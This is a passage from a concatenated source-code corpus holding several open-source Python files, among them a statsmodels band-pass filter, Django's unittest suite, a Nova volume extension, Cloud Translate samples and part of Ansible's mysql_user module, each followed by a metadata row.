self.assertEqual(test_question.question, "This is a test question rush b")
self.assertNotEqual(test_question.question, "bar")
self.assertNotEqual(filled_test_question.username, "CT")
def test_render_questions_A1(self):
"""Test question rendering"""
response = self.client.get('/gerund/A1')
content = response.content
self.assertTrue("My friend is good ... playing volleyball." in str(content))
def test_answer_submission_A1(self):
"""Test submission of answers A1"""
self.client.post('/gerund/A1', {'username': 'rare', '1': 'foo', '2': 'bar'})
query = models.FilledOpenQuestion.objects.filter(username='rare')
self.assertNotEqual(0, query.count())
| gpl-3.0 | 5,080,968,972,346,919,000 | 47.657143 | 116 | 0.698767 | false |
Alphadelta14/python-newdispatch | dispatch/events/event.py | 1 | 2415 |
class EventException(BaseException):
pass
class EventCancelled(EventException):
def __init__(self, evt):
EventException.__init__(self)
self.evt = evt
class EventDeferred(EventException):
pass
class EventData(object):
"""Object passed into emitted events
Attributes
----------
name : str
Name of event
source : Emitter
Source of event
data : object
Data passed in
cancelled : bool
Whether this event should continue to propagate.
Use Event.cancel() to cancel an event
errors : list
List of exceptions this event has encountered
    success : bool
Whether this event has successfully executed
    deferred : bool
        If True, the callback is being invoked a second time after a defer
Methods
-------
cancel
Cancel this event if cancellable
"""
def __init__(self, name, source, data=None, cancellable=True):
self.name = name
self.source = source
self.data = data
self.cancelled = False
self.cancellable = cancellable
self.errors = []
self.deferred = False
def cancel(self):
"""Cancel this event if possible
This halts the active callback
"""
if self.cancellable:
self.cancelled = True
raise EventCancelled(self)
def defer(self):
"""Call the current callback again later.
This will cause all lines before the defer to run again, so please
        use it at the start of the callback.
Examples
--------
>>> emitter = Emitter()
        >>> @emitter.on('some_event')
        ... def my_func1(evt):
        ...     evt.defer()
        ...     print('Callback #1 called!')
        >>> @emitter.on('some_event')
        ... def my_func2(evt):
        ...     print('Callback #2 called!')
>>> emitter.fire('some_event')
Callback #2 called!
Callback #1 called!
"""
if not self.deferred:
raise EventDeferred
def add_error(self, err):
"""Adds an error to the list of errors this event came across
Parameters
----------
err : Exception
"""
self.errors.append(err)
@property
def success(self):
"""Whether or not this event has successfully executed"""
return not self.cancelled and not self.errors
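# Minimal usage sketch (illustrative only; EventData is normally constructed
# by the dispatching machinery rather than by hand):
#
#   evt = EventData('save', source=None, data={'path': 'out.txt'})
#   try:
#       evt.cancel()               # raises EventCancelled when cancellable
#   except EventCancelled:
#       assert evt.cancelled and not evt.success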
| mit | 7,276,609,863,622,575,000 | 24.15625 | 74 | 0.5706 | false |
bsipocz/statsmodels | statsmodels/tsa/filters/cf_filter.py | 28 | 3435 | from statsmodels.compat.python import range
import numpy as np
from ._utils import _maybe_get_pandas_wrapper
# the data is sampled quarterly, so cut-off frequency of 18
# Wn is normalized cut-off freq
#Cutoff frequency is that frequency where the magnitude response of the filter
# is sqrt(1/2.). For butter, the normalized cutoff frequency Wn must be a
# number between 0 and 1, where 1 corresponds to the Nyquist frequency, pi
# radians per sample.
#NOTE: uses a loop, could probably be sped-up for very large datasets
def cffilter(X, low=6, high=32, drift=True):
"""
Christiano Fitzgerald asymmetric, random walk filter
Parameters
----------
X : array-like
1 or 2d array to filter. If 2d, variables are assumed to be in columns.
low : float
Minimum period of oscillations. Features below low periodicity are
filtered out. Default is 6 for quarterly data, giving a 1.5 year
periodicity.
high : float
Maximum period of oscillations. Features above high periodicity are
filtered out. Default is 32 for quarterly data, giving an 8 year
periodicity.
drift : bool
Whether or not to remove a trend from the data. The trend is estimated
as np.arange(nobs)*(X[-1] - X[0])/(len(X)-1)
Returns
-------
cycle : array
The features of `X` between periodicities given by low and high
trend : array
The trend in the data with the cycles removed.
Examples
--------
>>> import statsmodels.api as sm
>>> import pandas as pd
>>> dta = sm.datasets.macrodata.load_pandas().data
>>> dates = sm.tsa.datetools.dates_from_range('1959Q1', '2009Q3')
>>> index = pd.DatetimeIndex(dates)
>>> dta.set_index(index, inplace=True)
>>> cf_cycles, cf_trend = sm.tsa.filters.cffilter(dta[["infl", "unemp"]])
>>> import matplotlib.pyplot as plt
>>> fig, ax = plt.subplots()
>>> cf_cycles.plot(ax=ax, style=['r--', 'b-'])
>>> plt.show()
.. plot:: plots/cff_plot.py
"""
#TODO: cythonize/vectorize loop?, add ability for symmetric filter,
# and estimates of theta other than random walk.
if low < 2:
raise ValueError("low must be >= 2")
_pandas_wrapper = _maybe_get_pandas_wrapper(X)
X = np.asanyarray(X)
if X.ndim == 1:
X = X[:,None]
nobs, nseries = X.shape
a = 2*np.pi/high
b = 2*np.pi/low
if drift: # get drift adjusted series
X = X - np.arange(nobs)[:,None]*(X[-1] - X[0])/(nobs-1)
J = np.arange(1,nobs+1)
Bj = (np.sin(b*J)-np.sin(a*J))/(np.pi*J)
B0 = (b-a)/np.pi
Bj = np.r_[B0,Bj][:,None]
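    # Bj now holds the one-sided ideal band-pass weights B_0..B_{nobs-1};
    # the A and B terms computed in the loop below are endpoint adjustments
    # chosen so the filter weights sum to zero under the random-walk
    # assumption on the series.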
y = np.zeros((nobs,nseries))
for i in range(nobs):
B = -.5*Bj[0] -np.sum(Bj[1:-i-2])
A = -Bj[0] - np.sum(Bj[1:-i-2]) - np.sum(Bj[1:i]) - B
y[i] = Bj[0] * X[i] + np.dot(Bj[1:-i-2].T,X[i+1:-1]) + B*X[-1] + \
np.dot(Bj[1:i].T, X[1:i][::-1]) + A*X[0]
y = y.squeeze()
cycle, trend = y, X.squeeze()-y
if _pandas_wrapper is not None:
return _pandas_wrapper(cycle), _pandas_wrapper(trend)
return cycle, trend
if __name__ == "__main__":
import statsmodels as sm
dta = sm.datasets.macrodata.load().data[['infl','tbilrate']].view((float,2))[1:]
cycle, trend = cffilter(dta, 6, 32, drift=True)
dta = sm.datasets.macrodata.load().data['tbilrate'][1:]
cycle2, trend2 = cffilter(dta, 6, 32, drift=True)
| bsd-3-clause | 5,811,148,767,338,814,000 | 32.676471 | 84 | 0.607278 | false |
rimbalinux/LMD3 | django/utils/unittest/suite.py | 12 | 9580 | """TestSuite"""
import sys
import unittest
from django.utils.unittest import case, util
__unittest = True
class BaseTestSuite(unittest.TestSuite):
"""A simple test suite that doesn't provide class or module shared fixtures.
"""
def __init__(self, tests=()):
self._tests = []
self.addTests(tests)
def __repr__(self):
return "<%s tests=%s>" % (util.strclass(self.__class__), list(self))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return NotImplemented
return list(self) == list(other)
def __ne__(self, other):
return not self == other
# Can't guarantee hash invariant, so flag as unhashable
__hash__ = None
def __iter__(self):
return iter(self._tests)
def countTestCases(self):
cases = 0
for test in self:
cases += test.countTestCases()
return cases
def addTest(self, test):
# sanity checks
if not hasattr(test, '__call__'):
raise TypeError("%r is not callable" % (repr(test),))
if isinstance(test, type) and issubclass(test,
(case.TestCase, TestSuite)):
raise TypeError("TestCases and TestSuites must be instantiated "
"before passing them to addTest()")
self._tests.append(test)
def addTests(self, tests):
if isinstance(tests, basestring):
raise TypeError("tests must be an iterable of tests, not a string")
for test in tests:
self.addTest(test)
def run(self, result):
for test in self:
if result.shouldStop:
break
test(result)
return result
def __call__(self, *args, **kwds):
return self.run(*args, **kwds)
def debug(self):
"""Run the tests without collecting errors in a TestResult"""
for test in self:
test.debug()
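# Minimal usage sketch (SomeTestCase is a hypothetical TestCase subclass):
#
#   suite = BaseTestSuite()
#   suite.addTest(SomeTestCase('test_something'))
#   result = unittest.TestResult()
#   suite.run(result)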
class TestSuite(BaseTestSuite):
"""A test suite is a composite test consisting of a number of TestCases.
For use, create an instance of TestSuite, then add test case instances.
When all tests have been added, the suite can be passed to a test
runner, such as TextTestRunner. It will run the individual test cases
in the order in which they were added, aggregating the results. When
subclassing, do not forget to call the base class constructor.
"""
def run(self, result):
self._wrapped_run(result)
self._tearDownPreviousClass(None, result)
self._handleModuleTearDown(result)
return result
def debug(self):
"""Run the tests without collecting errors in a TestResult"""
debug = _DebugResult()
self._wrapped_run(debug, True)
self._tearDownPreviousClass(None, debug)
self._handleModuleTearDown(debug)
################################
# private methods
def _wrapped_run(self, result, debug=False):
for test in self:
if result.shouldStop:
break
if _isnotsuite(test):
self._tearDownPreviousClass(test, result)
self._handleModuleFixture(test, result)
self._handleClassSetUp(test, result)
result._previousTestClass = test.__class__
if (getattr(test.__class__, '_classSetupFailed', False) or
getattr(result, '_moduleSetUpFailed', False)):
continue
if hasattr(test, '_wrapped_run'):
test._wrapped_run(result, debug)
elif not debug:
test(result)
else:
test.debug()
def _handleClassSetUp(self, test, result):
previousClass = getattr(result, '_previousTestClass', None)
currentClass = test.__class__
if currentClass == previousClass:
return
if result._moduleSetUpFailed:
return
if getattr(currentClass, "__unittest_skip__", False):
return
try:
currentClass._classSetupFailed = False
except TypeError:
# test may actually be a function
# so its class will be a builtin-type
pass
setUpClass = getattr(currentClass, 'setUpClass', None)
if setUpClass is not None:
try:
setUpClass()
except Exception, e:
if isinstance(result, _DebugResult):
raise
currentClass._classSetupFailed = True
className = util.strclass(currentClass)
errorName = 'setUpClass (%s)' % className
self._addClassOrModuleLevelException(result, e, errorName)
def _get_previous_module(self, result):
previousModule = None
previousClass = getattr(result, '_previousTestClass', None)
if previousClass is not None:
previousModule = previousClass.__module__
return previousModule
def _handleModuleFixture(self, test, result):
previousModule = self._get_previous_module(result)
currentModule = test.__class__.__module__
if currentModule == previousModule:
return
self._handleModuleTearDown(result)
result._moduleSetUpFailed = False
try:
module = sys.modules[currentModule]
except KeyError:
return
setUpModule = getattr(module, 'setUpModule', None)
if setUpModule is not None:
try:
setUpModule()
except Exception, e:
if isinstance(result, _DebugResult):
raise
result._moduleSetUpFailed = True
errorName = 'setUpModule (%s)' % currentModule
self._addClassOrModuleLevelException(result, e, errorName)
def _addClassOrModuleLevelException(self, result, exception, errorName):
error = _ErrorHolder(errorName)
addSkip = getattr(result, 'addSkip', None)
if addSkip is not None and isinstance(exception, case.SkipTest):
addSkip(error, str(exception))
else:
result.addError(error, sys.exc_info())
def _handleModuleTearDown(self, result):
previousModule = self._get_previous_module(result)
if previousModule is None:
return
if result._moduleSetUpFailed:
return
try:
module = sys.modules[previousModule]
except KeyError:
return
tearDownModule = getattr(module, 'tearDownModule', None)
if tearDownModule is not None:
try:
tearDownModule()
except Exception, e:
if isinstance(result, _DebugResult):
raise
errorName = 'tearDownModule (%s)' % previousModule
self._addClassOrModuleLevelException(result, e, errorName)
def _tearDownPreviousClass(self, test, result):
previousClass = getattr(result, '_previousTestClass', None)
currentClass = test.__class__
if currentClass == previousClass:
return
if getattr(previousClass, '_classSetupFailed', False):
return
if getattr(result, '_moduleSetUpFailed', False):
return
if getattr(previousClass, "__unittest_skip__", False):
return
tearDownClass = getattr(previousClass, 'tearDownClass', None)
if tearDownClass is not None:
try:
tearDownClass()
except Exception, e:
if isinstance(result, _DebugResult):
raise
className = util.strclass(previousClass)
errorName = 'tearDownClass (%s)' % className
self._addClassOrModuleLevelException(result, e, errorName)
class _ErrorHolder(object):
"""
Placeholder for a TestCase inside a result. As far as a TestResult
is concerned, this looks exactly like a unit test. Used to insert
arbitrary errors into a test suite run.
"""
# Inspired by the ErrorHolder from Twisted:
# http://twistedmatrix.com/trac/browser/trunk/twisted/trial/runner.py
# attribute used by TestResult._exc_info_to_string
failureException = None
def __init__(self, description):
self.description = description
def id(self):
return self.description
def shortDescription(self):
return None
def __repr__(self):
return "<ErrorHolder description=%r>" % (self.description,)
def __str__(self):
return self.id()
def run(self, result):
# could call result.addError(...) - but this test-like object
# shouldn't be run anyway
pass
def __call__(self, result):
return self.run(result)
def countTestCases(self):
return 0
def _isnotsuite(test):
"A crude way to tell apart testcases and suites with duck-typing"
try:
iter(test)
except TypeError:
return True
return False
class _DebugResult(object):
"Used by the TestSuite to hold previous class when running in debug."
_previousTestClass = None
_moduleSetUpFailed = False
shouldStop = False
| bsd-3-clause | 3,871,075,794,207,900,700 | 31.379791 | 80 | 0.568685 | false |
NewpTone/stacklab-nova | nova/api/openstack/volume/contrib/volume_actions.py | 6 | 5150 | # Copyright 2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from xml.dom import minidom
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import exception
from nova import flags
from nova.openstack.common import log as logging
from nova.openstack.common.rpc import common as rpc_common
from nova import volume
FLAGS = flags.FLAGS
LOG = logging.getLogger(__name__)
def authorize(context, action_name):
action = 'volume_actions:%s' % action_name
extensions.extension_authorizer('volume', action)(context)
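# For example, authorize(context, "upload_image") enforces the
# "volume_actions:upload_image" policy for the requesting context.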
class VolumeToImageSerializer(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('os-volume_upload_image',
selector='os-volume_upload_image')
root.set('id')
root.set('updated_at')
root.set('status')
root.set('display_description')
root.set('size')
root.set('volume_type')
root.set('image_id')
root.set('container_format')
root.set('disk_format')
root.set('image_name')
return xmlutil.MasterTemplate(root, 1)
class VolumeToImageDeserializer(wsgi.XMLDeserializer):
"""Deserializer to handle xml-formatted requests"""
def default(self, string):
dom = minidom.parseString(string)
action_node = dom.childNodes[0]
action_name = action_node.tagName
action_data = {}
attributes = ["force", "image_name", "container_format", "disk_format"]
for attr in attributes:
if action_node.hasAttribute(attr):
action_data[attr] = action_node.getAttribute(attr)
if 'force' in action_data and action_data['force'] == 'True':
action_data['force'] = True
return {'body': {action_name: action_data}}
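    # Illustrative input/output (attribute values are hypothetical):
    #   <os-volume_upload_image image_name="snap" disk_format="raw"
    #                           container_format="bare" force="True"/>
    # deserializes to
    #   {'body': {'os-volume_upload_image': {'image_name': 'snap',
    #             'disk_format': 'raw', 'container_format': 'bare',
    #             'force': True}}}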
class VolumeActionsController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(VolumeActionsController, self).__init__(*args, **kwargs)
self.volume_api = volume.API()
@wsgi.response(202)
@wsgi.action('os-volume_upload_image')
@wsgi.serializers(xml=VolumeToImageSerializer)
@wsgi.deserializers(xml=VolumeToImageDeserializer)
def _volume_upload_image(self, req, id, body):
"""Uploads the specified volume to image service."""
context = req.environ['nova.context']
try:
params = body['os-volume_upload_image']
except (TypeError, KeyError):
msg = _("Invalid request body")
raise webob.exc.HTTPBadRequest(explanation=msg)
if not params.get("image_name"):
msg = _("No image_name was specified in request.")
raise webob.exc.HTTPBadRequest(explanation=msg)
force = params.get('force', False)
try:
volume = self.volume_api.get(context, id)
except exception.VolumeNotFound, error:
raise webob.exc.HTTPNotFound(explanation=unicode(error))
authorize(context, "upload_image")
image_metadata = {"container_format": params.get("container_format",
"bare"),
"disk_format": params.get("disk_format", "raw"),
"name": params["image_name"]}
try:
response = self.volume_api.copy_volume_to_image(context,
volume,
image_metadata,
force)
except exception.InvalidVolume, error:
raise webob.exc.HTTPBadRequest(explanation=unicode(error))
except ValueError, error:
raise webob.exc.HTTPBadRequest(explanation=unicode(error))
except rpc_common.RemoteError as error:
msg = "%(err_type)s: %(err_msg)s" % {'err_type': error.exc_type,
'err_msg': error.value}
raise webob.exc.HTTPBadRequest(explanation=msg)
return {'os-volume_upload_image': response}
class Volume_actions(extensions.ExtensionDescriptor):
"""Enable volume actions
"""
name = "VolumeActions"
alias = "os-volume-actions"
namespace = "http://docs.openstack.org/volume/ext/volume-actions/api/v1.1"
updated = "2012-05-31T00:00:00+00:00"
def get_controller_extensions(self):
controller = VolumeActionsController()
extension = extensions.ControllerExtension(self, 'volumes', controller)
return [extension]
| apache-2.0 | 8,319,964,724,987,609,000 | 38.312977 | 79 | 0.618252 | false |
hashems/Mobile-Cloud-Development-Projects | translate/cloud-client/snippets.py | 4 | 4692 | #!/usr/bin/env python
# Copyright 2016 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This application demonstrates how to perform basic operations with the
Google Cloud Translate API
For more information, the documentation at
https://cloud.google.com/translate/docs.
"""
import argparse
from google.cloud import translate
def detect_language(text):
"""Detects the text's language."""
translate_client = translate.Client()
# Text can also be a sequence of strings, in which case this method
# will return a sequence of results for each text.
result = translate_client.detect_language(text)
print('Text: {}'.format(text))
print('Confidence: {}'.format(result['confidence']))
print('Language: {}'.format(result['language']))
def list_languages():
"""Lists all available languages."""
translate_client = translate.Client()
results = translate_client.get_languages()
for language in results:
print(u'{name} ({language})'.format(**language))
def list_languages_with_target(target):
"""Lists all available languages and localizes them to the target language.
Target must be an ISO 639-1 language code.
See https://g.co/cloud/translate/v2/translate-reference#supported_languages
"""
translate_client = translate.Client()
results = translate_client.get_languages(target_language=target)
for language in results:
print(u'{name} ({language})'.format(**language))
def translate_text_with_model(target, text, model=translate.NMT):
"""Translates text into the target language.
Make sure your project is whitelisted.
Target must be an ISO 639-1 language code.
See https://g.co/cloud/translate/v2/translate-reference#supported_languages
"""
translate_client = translate.Client()
# Text can also be a sequence of strings, in which case this method
# will return a sequence of results for each text.
result = translate_client.translate(
text,
target_language=target,
model=model)
print(u'Text: {}'.format(result['input']))
print(u'Translation: {}'.format(result['translatedText']))
print(u'Detected source language: {}'.format(
result['detectedSourceLanguage']))
def translate_text(target, text):
"""Translates text into the target language.
Target must be an ISO 639-1 language code.
See https://g.co/cloud/translate/v2/translate-reference#supported_languages
"""
translate_client = translate.Client()
# Text can also be a sequence of strings, in which case this method
# will return a sequence of results for each text.
result = translate_client.translate(
text,
target_language=target)
print(u'Text: {}'.format(result['input']))
print(u'Translation: {}'.format(result['translatedText']))
print(u'Detected source language: {}'.format(
result['detectedSourceLanguage']))
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
subparsers = parser.add_subparsers(dest='command')
detect_langage_parser = subparsers.add_parser(
'detect-language', help=detect_language.__doc__)
detect_langage_parser.add_argument('text')
list_languages_parser = subparsers.add_parser(
'list-languages', help=list_languages.__doc__)
list_languages_with_target_parser = subparsers.add_parser(
'list-languages-with-target', help=list_languages_with_target.__doc__)
list_languages_with_target_parser.add_argument('target')
translate_text_parser = subparsers.add_parser(
'translate-text', help=translate_text.__doc__)
translate_text_parser.add_argument('target')
translate_text_parser.add_argument('text')
args = parser.parse_args()
if args.command == 'detect-language':
detect_language(args.text)
elif args.command == 'list-languages':
list_languages()
elif args.command == 'list-languages-with-target':
list_languages_with_target(args.target)
elif args.command == 'translate-text':
translate_text(args.target, args.text)
| apache-2.0 | 7,563,367,722,656,731,000 | 32.514286 | 79 | 0.696292 | false |
jjshoe/ansible-modules-core | database/mysql/mysql_user.py | 5 | 22174 | #!/usr/bin/python
# (c) 2012, Mark Theunissen <[email protected]>
# Sponsored by Four Kitchens http://fourkitchens.com.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: mysql_user
short_description: Adds or removes a user from a MySQL database.
description:
- Adds or removes a user from a MySQL database.
version_added: "0.6"
options:
name:
description:
- name of the user (role) to add or remove
required: true
password:
description:
- set the user's password. (Required when adding a user)
required: false
default: null
encrypted:
description:
- Indicate that the 'password' field is a `mysql_native_password` hash
required: false
choices: [ "yes", "no" ]
default: "no"
version_added: "2.0"
host:
description:
- the 'host' part of the MySQL username
required: false
default: localhost
host_all:
description:
- override the host option, making ansible apply changes to
all hostnames for a given user. This option cannot be used
when creating users
required: false
choices: [ "yes", "no" ]
default: "no"
version_added: "2.1"
priv:
description:
- "MySQL privileges string in the format: C(db.table:priv1,priv2)"
required: false
default: null
append_privs:
description:
- Append the privileges defined by priv to the existing ones for this
user instead of overwriting existing ones.
required: false
choices: [ "yes", "no" ]
default: "no"
version_added: "1.4"
state:
description:
- Whether the user should exist. When C(absent), removes
the user.
required: false
default: present
choices: [ "present", "absent" ]
check_implicit_admin:
description:
- Check if mysql allows login as root/nopassword before trying supplied credentials.
required: false
choices: [ "yes", "no" ]
default: "no"
version_added: "1.3"
update_password:
required: false
default: always
choices: ['always', 'on_create']
version_added: "2.0"
description:
- C(always) will update passwords if they differ. C(on_create) will only set the password for newly created users.
notes:
- "MySQL server installs with default login_user of 'root' and no password. To secure this user
as part of an idempotent playbook, you must create at least two tasks: the first must change the root user's password,
without providing any login_user/login_password details. The second must drop a ~/.my.cnf file containing
the new root credentials. Subsequent runs of the playbook will then succeed by reading the new credentials from
the file."
   - Currently, only the `mysql_native_password` encrypted password hash is supported.
author: "Jonathan Mainguy (@Jmainguy)"
extends_documentation_fragment: mysql
'''
EXAMPLES = """
# Removes anonymous user account for localhost
- mysql_user: name='' host=localhost state=absent
# Removes all anonymous user accounts
- mysql_user: name='' host_all=yes state=absent
# Create database user with name 'bob' and password '12345' with all database privileges
- mysql_user: name=bob password=12345 priv=*.*:ALL state=present
# Create database user with name 'bob' and previously hashed mysql native password '*EE0D72C1085C46C5278932678FBE2C6A782821B4' with all database privileges
- mysql_user: name=bob password='*EE0D72C1085C46C5278932678FBE2C6A782821B4' encrypted=yes priv=*.*:ALL state=present
# Creates database user 'bob' and password '12345' with all database privileges and 'WITH GRANT OPTION'
- mysql_user: name=bob password=12345 priv=*.*:ALL,GRANT state=present
# Modify user Bob to require SSL connections. Note that REQUIRESSL is a special privilege that should only apply to *.* by itself.
- mysql_user: name=bob append_privs=true priv=*.*:REQUIRESSL state=present
# Ensure no user named 'sally'@'localhost' exists, also passing in the auth credentials.
- mysql_user: login_user=root login_password=123456 name=sally state=absent
# Ensure no user named 'sally' exists at all
- mysql_user: name=sally host_all=yes state=absent
# Specify grants composed of more than one word
- mysql_user: name=replication password=12345 priv="*.*:REPLICATION CLIENT" state=present
# Revoke all privileges for user 'bob' and password '12345'
- mysql_user: name=bob password=12345 priv=*.*:USAGE state=present
# Example privileges string format
mydb.*:INSERT,UPDATE/anotherdb.*:SELECT/yetanotherdb.*:ALL
# Example using login_unix_socket to connect to server
- mysql_user: name=root password=abc123 login_unix_socket=/var/run/mysqld/mysqld.sock
# Example .my.cnf file for setting the root password
[client]
user=root
password=n<_665{vS43y
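# Hedged illustration (editor's addition, not from the original module): the
# two-task pattern described in the notes for securing the default root login.
# The template file my.cnf.j2 and the variable new_root_password are
# placeholders you must supply yourself.
- mysql_user: name=root password={{ new_root_password }} host={{ item }}
  with_items:
    - "{{ ansible_hostname }}"
    - 127.0.0.1
    - ::1
    - localhost
- template: src=my.cnf.j2 dest=/root/.my.cnf owner=root group=root mode=0600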
"""
import getpass
import tempfile
import re
import string
try:
import MySQLdb
except ImportError:
mysqldb_found = False
else:
mysqldb_found = True
VALID_PRIVS = frozenset(('CREATE', 'DROP', 'GRANT', 'GRANT OPTION',
'LOCK TABLES', 'REFERENCES', 'EVENT', 'ALTER',
'DELETE', 'INDEX', 'INSERT', 'SELECT', 'UPDATE',
'CREATE TEMPORARY TABLES', 'TRIGGER', 'CREATE VIEW',
'SHOW VIEW', 'ALTER ROUTINE', 'CREATE ROUTINE',
'EXECUTE', 'FILE', 'CREATE TABLESPACE', 'CREATE USER',
'PROCESS', 'PROXY', 'RELOAD', 'REPLICATION CLIENT',
'REPLICATION SLAVE', 'SHOW DATABASES', 'SHUTDOWN',
'SUPER', 'ALL', 'ALL PRIVILEGES', 'USAGE', 'REQUIRESSL'))
class InvalidPrivsError(Exception):
pass
# ===========================================
# MySQL module specific support methods.
#
# User Authentication Management was change in MySQL 5.7
# This is a generic check for if the server version is less than version 5.7
def server_version_check(cursor):
cursor.execute("SELECT VERSION()");
result = cursor.fetchone()
version_str = result[0]
version = version_str.split('.')
# Currently we have no facility to handle new-style password update on
# mariadb and the old-style update continues to work
if 'mariadb' in version_str.lower():
return True
if (int(version[0]) <= 5 and int(version[1]) < 7):
return True
else:
return False
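def _server_version_check_example():
    # Hedged illustration (editor's sketch, not part of the original module):
    # mirrors the decision above -- MariaDB and anything below 5.7 use the
    # old-style password statements.
    for version_str, expect_old in [('5.6.34', True),
                                    ('5.7.17', False),
                                    ('10.1.21-MariaDB', True)]:
        version = version_str.split('.')
        old = 'mariadb' in version_str.lower() or (
            int(version[0]) <= 5 and int(version[1]) < 7)
        assert old is expect_old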
def get_mode(cursor):
cursor.execute('SELECT @@GLOBAL.sql_mode')
result = cursor.fetchone()
mode_str = result[0]
if 'ANSI' in mode_str:
mode = 'ANSI'
else:
mode = 'NOTANSI'
return mode
def user_exists(cursor, user, host, host_all):
if host_all:
cursor.execute("SELECT count(*) FROM user WHERE user = %s", user)
else:
cursor.execute("SELECT count(*) FROM user WHERE user = %s AND host = %s", (user,host))
count = cursor.fetchone()
return count[0] > 0
def user_add(cursor, user, host, host_all, password, encrypted, new_priv, check_mode):
# we cannot create users without a proper hostname
if host_all:
return False
if check_mode:
return True
if password and encrypted:
cursor.execute("CREATE USER %s@%s IDENTIFIED BY PASSWORD %s", (user,host,password))
elif password and not encrypted:
cursor.execute("CREATE USER %s@%s IDENTIFIED BY %s", (user,host,password))
if new_priv is not None:
for db_table, priv in new_priv.iteritems():
privileges_grant(cursor, user,host,db_table,priv)
return True
def is_hash(password):
ishash = False
if len(password) == 41 and password[0] == '*':
if frozenset(password[1:]).issubset(string.hexdigits):
ishash = True
return ishash
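def _is_hash_example():
    # Hedged illustration (editor's sketch, not part of the original module):
    # a mysql_native_password hash is '*' followed by 40 hex digits.
    assert is_hash('*' + 'A' * 40)   # well-formed hash shape
    assert not is_hash('plaintext')  # wrong length / no leading '*'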
def user_mod(cursor, user, host, host_all, password, encrypted, new_priv, append_privs, check_mode):
changed = False
grant_option = False
if host_all:
hostnames = user_get_hostnames(cursor, user)
else:
hostnames = [host]
for host in hostnames:
# Handle clear text and hashed passwords.
if bool(password):
# Determine what user management method server uses
old_user_mgmt = server_version_check(cursor)
if old_user_mgmt:
cursor.execute("SELECT password FROM user WHERE user = %s AND host = %s", (user,host))
else:
cursor.execute("SELECT authentication_string FROM user WHERE user = %s AND host = %s", (user,host))
current_pass_hash = cursor.fetchone()
if encrypted:
encrypted_string = (password)
if is_hash(password):
if current_pass_hash[0] != encrypted_string:
if check_mode:
return True
if old_user_mgmt:
cursor.execute("SET PASSWORD FOR %s@%s = %s", (user, host, password))
else:
cursor.execute("ALTER USER %s@%s IDENTIFIED WITH mysql_native_password AS %s", (user, host, password))
changed = True
else:
                    raise InvalidPrivsError("encrypted was specified however it does not appear to be a valid hash expecting: *SHA1(SHA1(your_password))")
else:
if old_user_mgmt:
cursor.execute("SELECT PASSWORD(%s)", (password,))
else:
cursor.execute("SELECT CONCAT('*', UCASE(SHA1(UNHEX(SHA1(%s)))))", (password,))
new_pass_hash = cursor.fetchone()
if current_pass_hash[0] != new_pass_hash[0]:
if check_mode:
return True
if old_user_mgmt:
cursor.execute("SET PASSWORD FOR %s@%s = PASSWORD(%s)", (user, host, password))
else:
cursor.execute("ALTER USER %s@%s IDENTIFIED BY %s", (user, host, password))
changed = True
# Handle privileges
if new_priv is not None:
curr_priv = privileges_get(cursor, user,host)
# If the user has privileges on a db.table that doesn't appear at all in
# the new specification, then revoke all privileges on it.
for db_table, priv in curr_priv.iteritems():
# If the user has the GRANT OPTION on a db.table, revoke it first.
if "GRANT" in priv:
grant_option = True
if db_table not in new_priv:
if user != "root" and "PROXY" not in priv and not append_privs:
if check_mode:
return True
privileges_revoke(cursor, user,host,db_table,priv,grant_option)
changed = True
# If the user doesn't currently have any privileges on a db.table, then
# we can perform a straight grant operation.
for db_table, priv in new_priv.iteritems():
if db_table not in curr_priv:
if check_mode:
return True
privileges_grant(cursor, user,host,db_table,priv)
changed = True
# If the db.table specification exists in both the user's current privileges
# and in the new privileges, then we need to see if there's a difference.
db_table_intersect = set(new_priv.keys()) & set(curr_priv.keys())
for db_table in db_table_intersect:
priv_diff = set(new_priv[db_table]) ^ set(curr_priv[db_table])
if (len(priv_diff) > 0):
if check_mode:
return True
if not append_privs:
privileges_revoke(cursor, user,host,db_table,curr_priv[db_table],grant_option)
privileges_grant(cursor, user,host,db_table,new_priv[db_table])
changed = True
return changed
def user_delete(cursor, user, host, host_all, check_mode):
if check_mode:
return True
if host_all:
hostnames = user_get_hostnames(cursor, user)
for hostname in hostnames:
cursor.execute("DROP USER %s@%s", (user, hostname))
else:
cursor.execute("DROP USER %s@%s", (user, host))
return True
def user_get_hostnames(cursor, user):
cursor.execute("SELECT Host FROM mysql.user WHERE user = %s", user)
hostnames_raw = cursor.fetchall()
hostnames = []
for hostname_raw in hostnames_raw:
hostnames.append(hostname_raw[0])
return hostnames
def privileges_get(cursor, user,host):
""" MySQL doesn't have a better method of getting privileges aside from the
SHOW GRANTS query syntax, which requires us to then parse the returned string.
Here's an example of the string that is returned from MySQL:
GRANT USAGE ON *.* TO 'user'@'localhost' IDENTIFIED BY 'pass';
This function makes the query and returns a dictionary containing the results.
The dictionary format is the same as that returned by privileges_unpack() below.
"""
output = {}
cursor.execute("SHOW GRANTS FOR %s@%s", (user, host))
grants = cursor.fetchall()
